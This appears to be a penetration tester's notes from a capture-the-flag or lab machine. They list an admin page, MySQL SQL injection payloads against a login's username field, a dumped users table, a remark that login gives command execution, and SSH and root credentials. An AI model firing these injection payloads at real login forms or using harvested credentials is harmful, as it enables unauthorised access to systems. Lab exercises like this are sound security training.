interesting directory
=====================
/administrator.php


SQLi vulnerable
===============
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZNVW' RLIKE (SELECT (CASE WHEN (5387=5387) THEN 0x5a4e5657 ELSE 0x28 END))-- sAif&password=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=ZNVW' OR (SELECT 6170 FROM(SELECT COUNT(*),CONCAT(0x716b707071,(SELECT (ELT(6170=6170,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uaRq&password=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=ZNVW' AND (SELECT 1852 FROM (SELECT(SLEEP(5)))LrFN)-- yNhT&password=

interesting database users
interesting table users

Database: users
Table: users
[1 entry]
+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+

-after login can exec command RCE


interesting file
=====================
/var/hidden/pass => pinguapingu

ssh cred (pingu:pinguapingu)

creds
====
papa:postman
root:love2fish


